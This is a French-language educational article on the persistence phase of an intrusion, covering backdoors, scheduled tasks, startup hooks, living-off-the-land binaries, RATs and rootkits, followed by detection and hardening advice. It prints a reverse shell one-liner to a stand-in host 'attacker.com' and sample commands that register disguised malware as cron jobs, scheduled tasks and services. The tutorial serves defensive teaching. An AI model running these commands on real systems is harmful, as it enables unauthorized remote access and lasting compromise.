Une fois l’exploitation réussie, l’attaquant doit consolider sa position. La phase d’installation consiste à déployer des outils qui garantissent un accès durable au système compromis. Sans cette étape, l’intrusion serait éphémère — un simple redémarrage pourrait tout effacer.
Cette phase est critique pour l’attaquant : c’est le moment où il transforme un accès temporaire en présence permanente. C’est aussi une fenêtre d’opportunité pour les défenseurs qui savent quoi surveiller.
Qu’est-ce que la phase d’installation ?
Section intitulée « Qu’est-ce que la phase d’installation ? »La phase d’installation (parfois appelée “persistance”) est le moment où l’attaquant implante des outils et mécanismes pour :
- Maintenir l’accès même après un redémarrage ou une déconnexion
- Survivre aux mises à jour et aux actions de remédiation basiques
- Faciliter le retour en cas de détection partielle
- Préparer les phases suivantes (C2, mouvement latéral)
L’objectif est de devenir un “résident permanent” du système, invisible et difficile à déloger.
Techniques de persistance
Section intitulée « Techniques de persistance »Backdoors et webshells
Section intitulée « Backdoors et webshells »Une backdoor est un point d’accès caché qui permet de contourner l’authentification normale :
- Webshells : scripts PHP, ASP ou JSP déposés sur un serveur web
- Reverse shells : connexions sortantes vers l’attaquant
- Implants mémoire : code résidant uniquement en RAM (fileless)
# Exemple de reverse shell basique (à des fins éducatives)bash -i >& /dev/tcp/attacker.com/4444 0>&1Modification des mécanismes d’authentification
Section intitulée « Modification des mécanismes d’authentification »L’attaquant peut altérer les systèmes d’authentification pour garantir son accès :
| Technique | Description | Détection |
|---|---|---|
| Ajout d’utilisateur | Création d’un compte administrateur | Audit des créations de comptes |
| Clé SSH autorisée | Ajout dans ~/.ssh/authorized_keys | Monitoring des fichiers SSH |
| Skeleton Key | Mot de passe universel sur AD | Analyse mémoire du DC |
| Golden Ticket | Ticket Kerberos forgé | Analyse des tickets anormaux |
Tâches planifiées et services
Section intitulée « Tâches planifiées et services »Les mécanismes de planification du système sont détournés pour exécuter du code malveillant :
Linux :
# Crontab malveillant* * * * * /tmp/.hidden/beacon.sh
# Service systemd[Service]ExecStart=/usr/local/bin/legitimate-looking-nameWindows :
# Tâche planifiéeschtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\update.exe" /sc onstart
# Service Windowssc create "Windows Defender Update" binpath= "C:\malware.exe"Modification du démarrage
Section intitulée « Modification du démarrage »L’attaquant s’assure que son code s’exécute à chaque démarrage :
- Clés de registre Run/RunOnce (Windows)
- Scripts rc.local ou init.d (Linux)
- Modification du bootloader (rootkits avancés)
- WMI Event Subscriptions (Windows)
- Login hooks et LaunchAgents (macOS)
Techniques “Living off the Land”
Section intitulée « Techniques “Living off the Land” »Plutôt que d’installer des outils, l’attaquant utilise ceux déjà présents sur le système — c’est le concept de GTFOBins et LOLBins :
- PowerShell : téléchargement et exécution de scripts
- Certutil : décodage de payloads encodés
- Bitsadmin : transfert de fichiers
- Regsvr32 : exécution de code via DLL
Ces techniques sont difficiles à détecter car elles utilisent des binaires légitimes signés par Microsoft ou le vendeur du système.
Outils couramment déployés
Section intitulée « Outils couramment déployés »RAT (Remote Access Trojans)
Section intitulée « RAT (Remote Access Trojans) »Les RAT offrent un contrôle complet à distance :
- Fonctionnalités : shell, capture d’écran, keylogger, webcam, fichiers
- Exemples connus : Cobalt Strike Beacon, Meterpreter, njRAT, DarkComet
- Caractéristique : interface graphique pour l’attaquant
Implants modulaires
Section intitulée « Implants modulaires »Les frameworks modernes utilisent des implants modulaires qui téléchargent uniquement les fonctionnalités nécessaires :
- Avantage : empreinte minimale, difficile à détecter
- Fonctionnement : noyau minimal + modules chargés à la demande
- Exemples : Cobalt Strike, Brute Ratel, Sliver
Rootkits
Section intitulée « Rootkits »Les rootkits s’intègrent profondément dans le système pour masquer leur présence :
- User-mode rootkits : modification des bibliothèques systèmes
- Kernel-mode rootkits : modification du noyau
- Bootkits : infection du processus de démarrage
Comment détecter l’installation ?
Section intitulée « Comment détecter l’installation ? »Surveillance des fichiers critiques
Section intitulée « Surveillance des fichiers critiques »Monitorer les modifications dans les zones sensibles :
Windows :- C:\Windows\System32\- C:\Windows\Tasks\- Registre (Run, Services)- %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
Linux :- /etc/cron.*- /etc/systemd/system/- ~/.ssh/authorized_keys- /etc/passwd, /etc/shadowAnalyse des processus et services
Section intitulée « Analyse des processus et services »- Processus avec des noms légitimes lancés depuis des chemins inhabituels
- Services récemment créés ou modifiés
- Processus orphelins ou avec un parent suspect
- Connexions réseau depuis des processus inattendus
Outils de détection
Section intitulée « Outils de détection »| Outil | Usage |
|---|---|
| AIDE | Intégrité des fichiers (Linux) |
| Autoruns | Analyse des points de persistance (Windows) |
| OSQuery | Requêtes SQL sur l’état du système |
| Velociraptor | Forensics et hunting à grande échelle |
Comment se protéger ?
Section intitulée « Comment se protéger ? »Contrôle d’intégrité
Section intitulée « Contrôle d’intégrité »- Déployer un HIDS (Host-based Intrusion Detection System)
- Hasher les binaires critiques et vérifier régulièrement
- Utiliser des systèmes immuables quand possible
Restriction des privilèges
Section intitulée « Restriction des privilèges »- Moindre privilège pour tous les comptes
- Contrôler qui peut créer des services et tâches planifiées
- Limiter l’accès aux répertoires sensibles
- Bloquer l’exécution depuis les répertoires temporaires
Durcissement système
Section intitulée « Durcissement système »- AppArmor ou SELinux sur Linux
- Windows Defender Application Control (WDAC)
- Désactiver PowerShell v2 et les protocoles obsolètes
- Activer la signature des scripts
Logging et audit
Section intitulée « Logging et audit »- Activer l’audit des créations de processus (Windows Event 4688)
- Logger les commandes PowerShell (ScriptBlock Logging)
- Centraliser les logs avec un SIEM
- Alerter sur les comportements suspects
À retenir
Section intitulée « À retenir »-
L’installation transforme un accès temporaire en présence durable — c’est la phase où l’attaquant “s’enracine”
-
Les techniques de persistance sont nombreuses — il faut surveiller plusieurs vecteurs simultanément
-
Living off the Land rend la détection difficile car les outils utilisés sont légitimes
-
La surveillance des fichiers critiques est essentielle pour détecter les implants
-
Le durcissement préventif (moindre privilège, contrôle d’exécution) limite les options de l’attaquant
-
Les logs sont votre meilleur allié — sans visibilité, pas de détection